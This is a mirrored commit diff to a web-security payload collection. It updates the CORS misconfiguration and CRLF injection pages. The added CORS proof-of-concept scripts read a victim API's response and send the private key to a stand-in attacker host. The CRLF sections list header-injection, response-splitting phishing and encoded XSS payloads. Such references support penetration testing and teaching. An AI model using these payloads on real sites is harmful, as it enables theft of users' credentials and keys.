mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-11 22:15:26 +00:00
Merge pull request #274 from bolli95/master
CORS and CRLF documentation updated
This commit is contained in:
commit
fa497c2149
@ -22,7 +22,7 @@
|
|||||||
|
|
||||||
## Exploitation
|
## Exploitation
|
||||||
|
|
||||||
Usually you want to target an API endpoint. Use the following payload to exploit a CORS misconfiguration on target **https://victim.example.com/endpoint**.
|
Usually you want to target an API endpoint. Use the following payload to exploit a CORS misconfiguration on target `https://victim.example.com/endpoint`.
|
||||||
|
|
||||||
### Vulnerable Example: Origin Reflection
|
### Vulnerable Example: Origin Reflection
|
||||||
|
|
||||||
@ -43,6 +43,8 @@ Access-Control-Allow-Credentials: true
|
|||||||
|
|
||||||
#### Proof of concept
|
#### Proof of concept
|
||||||
|
|
||||||
|
This PoC requires that the respective JS script is hosted at `evil.com`
|
||||||
|
|
||||||
```js
|
```js
|
||||||
var req = new XMLHttpRequest();
|
var req = new XMLHttpRequest();
|
||||||
req.onload = reqListener;
|
req.onload = reqListener;
|
||||||
@ -173,6 +175,75 @@ function reqListener() {
|
|||||||
};
|
};
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Vulnerable Example: Expanding the Origin / Regex Issues
|
||||||
|
Occasionally, certain expantions of the original origin are not filtered on the server side. This might be caused by using a badly implemented regular expressions to validate the origin header.
|
||||||
|
|
||||||
|
#### Vulnerable Implementation (Example 1)
|
||||||
|
|
||||||
|
In this scenario any prefix inserted in front of `example.com` will be accepted by the server.
|
||||||
|
|
||||||
|
```
|
||||||
|
GET /endpoint HTTP/1.1
|
||||||
|
Host: api.example.com
|
||||||
|
Origin: https://evilexample.com
|
||||||
|
|
||||||
|
HTTP/1.1 200 OK
|
||||||
|
Access-Control-Allow-Origin: https://evilexample.com
|
||||||
|
Access-Control-Allow-Credentials: true
|
||||||
|
|
||||||
|
{"[private API key]"}
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
#### Proof of concept (Example 1)
|
||||||
|
|
||||||
|
This PoC requires the respective JS script to be hosted at `evilexample.com`
|
||||||
|
|
||||||
|
```js
|
||||||
|
var req = new XMLHttpRequest();
|
||||||
|
req.onload = reqListener;
|
||||||
|
req.open('get','https://api.example.com/endpoint',true);
|
||||||
|
req.withCredentials = true;
|
||||||
|
req.send();
|
||||||
|
|
||||||
|
function reqListener() {
|
||||||
|
location='//atttacker.net/log?key='+this.responseText;
|
||||||
|
};
|
||||||
|
```
|
||||||
|
|
||||||
|
#### Vulnerable Implementation (Example 2)
|
||||||
|
|
||||||
|
In this scenario the server utilizes a regex where the dot was not escaped correctly. For instance, something like this: `^api.example.com$` instead of `^api\.example.com$`. Thus, the dot can be replaced with any letter to gain access from a third-party domain.
|
||||||
|
|
||||||
|
```
|
||||||
|
GET /endpoint HTTP/1.1
|
||||||
|
Host: api.example.com
|
||||||
|
Origin: https://apiiexample.com
|
||||||
|
|
||||||
|
HTTP/1.1 200 OK
|
||||||
|
Access-Control-Allow-Origin: https://apiiexample.com
|
||||||
|
Access-Control-Allow-Credentials: true
|
||||||
|
|
||||||
|
{"[private API key]"}
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
#### Proof of concept (Example 2)
|
||||||
|
|
||||||
|
This PoC requires the respective JS script to be hosted at `apiiexample.com`
|
||||||
|
|
||||||
|
```js
|
||||||
|
var req = new XMLHttpRequest();
|
||||||
|
req.onload = reqListener;
|
||||||
|
req.open('get','https://api.example.com/endpoint',true);
|
||||||
|
req.withCredentials = true;
|
||||||
|
req.send();
|
||||||
|
|
||||||
|
function reqListener() {
|
||||||
|
location='//atttacker.net/log?key='+this.responseText;
|
||||||
|
};
|
||||||
|
```
|
||||||
|
|
||||||
## Bug Bounty reports
|
## Bug Bounty reports
|
||||||
|
|
||||||
* [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax)](https://hackerone.com/reports/168574)
|
* [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax)](https://hackerone.com/reports/168574)
|
||||||
@ -188,3 +259,4 @@ function reqListener() {
|
|||||||
* [Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - Geekboy - DECEMBER 16, 2016](https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/)
|
* [Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - Geekboy - DECEMBER 16, 2016](https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/)
|
||||||
* [Advanced CORS Exploitation Techniques - Corben Leo - June 16, 2018](https://www.corben.io/advanced-cors-techniques/)
|
* [Advanced CORS Exploitation Techniques - Corben Leo - June 16, 2018](https://www.corben.io/advanced-cors-techniques/)
|
||||||
* [PortSwigger Web Security Academy: CORS](https://portswigger.net/web-security/cors)
|
* [PortSwigger Web Security Academy: CORS](https://portswigger.net/web-security/cors)
|
||||||
|
* [CORS Misconfigurations Explained - Detectify Blog](https://blog.detectify.com/2018/04/26/cors-misconfigurations-explained/)
|
||||||
|
@ -16,13 +16,13 @@
|
|||||||
|
|
||||||
Requested page
|
Requested page
|
||||||
|
|
||||||
```powershell
|
```http
|
||||||
http://www.example.net/%0D%0ASet-Cookie:mycookie=myvalue
|
http://www.example.net/%0D%0ASet-Cookie:mycookie=myvalue
|
||||||
```
|
```
|
||||||
|
|
||||||
HTTP Response
|
HTTP Response
|
||||||
|
|
||||||
```powershell
|
```http
|
||||||
Connection: keep-alive
|
Connection: keep-alive
|
||||||
Content-Length: 178
|
Content-Length: 178
|
||||||
Content-Type: text/html
|
Content-Type: text/html
|
||||||
@ -45,7 +45,7 @@ http://example.com/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23
|
|||||||
|
|
||||||
HTTP Response
|
HTTP Response
|
||||||
|
|
||||||
```powershell
|
```http
|
||||||
HTTP/1.1 200 OK
|
HTTP/1.1 200 OK
|
||||||
Date: Tue, 20 Dec 2016 14:34:03 GMT
|
Date: Tue, 20 Dec 2016 14:34:03 GMT
|
||||||
Content-Type: text/html; charset=utf-8
|
Content-Type: text/html; charset=utf-8
|
||||||
@ -70,13 +70,13 @@ X-XSS-Protection:0
|
|||||||
|
|
||||||
Requested page
|
Requested page
|
||||||
|
|
||||||
```powershell
|
```http
|
||||||
http://www.example.net/index.php?lang=en%0D%0AContent-Length%3A%200%0A%20%0AHTTP/1.1%20200%20OK%0AContent-Type%3A%20text/html%0ALast-Modified%3A%20Mon%2C%2027%20Oct%202060%2014%3A50%3A18%20GMT%0AContent-Length%3A%2034%0A%20%0A%3Chtml%3EYou%20have%20been%20Phished%3C/html%3E
|
http://www.example.net/index.php?lang=en%0D%0AContent-Length%3A%200%0A%20%0AHTTP/1.1%20200%20OK%0AContent-Type%3A%20text/html%0ALast-Modified%3A%20Mon%2C%2027%20Oct%202060%2014%3A50%3A18%20GMT%0AContent-Length%3A%2034%0A%20%0A%3Chtml%3EYou%20have%20been%20Phished%3C/html%3E
|
||||||
```
|
```
|
||||||
|
|
||||||
HTTP response
|
HTTP response
|
||||||
|
|
||||||
```powershell
|
```http
|
||||||
Set-Cookie:en
|
Set-Cookie:en
|
||||||
Content-Length: 0
|
Content-Length: 0
|
||||||
|
|
||||||
@ -92,7 +92,7 @@ Content-Length: 34
|
|||||||
|
|
||||||
Using UTF-8 encoding
|
Using UTF-8 encoding
|
||||||
|
|
||||||
```powershell
|
```http
|
||||||
%E5%98%8A%E5%98%8Dcontent-type:text/html%E5%98%8A%E5%98%8Dlocation:%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%BCsvg/onload=alert%28innerHTML%28%29%E5%98%BE
|
%E5%98%8A%E5%98%8Dcontent-type:text/html%E5%98%8A%E5%98%8Dlocation:%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%BCsvg/onload=alert%28innerHTML%28%29%E5%98%BE
|
||||||
```
|
```
|
||||||
|
|
||||||
@ -103,6 +103,11 @@ Remainder:
|
|||||||
* %E5%98%BE = %3E = \u563e (>)
|
* %E5%98%BE = %3E = \u563e (>)
|
||||||
* %E5%98%BC = %3C = \u563c (<)
|
* %E5%98%BC = %3C = \u563c (<)
|
||||||
|
|
||||||
|
|
||||||
|
## Exploitation Tricks
|
||||||
|
* Try to search for parameters that lead to redirects and fuzz them
|
||||||
|
* Also test the mobile version of the website, sometimes it is different or uses a different backend
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
* https://www.owasp.org/index.php/CRLF_Injection
|
* https://www.owasp.org/index.php/CRLF_Injection
|
||||||
|
Loading…
Reference in New Issue
Block a user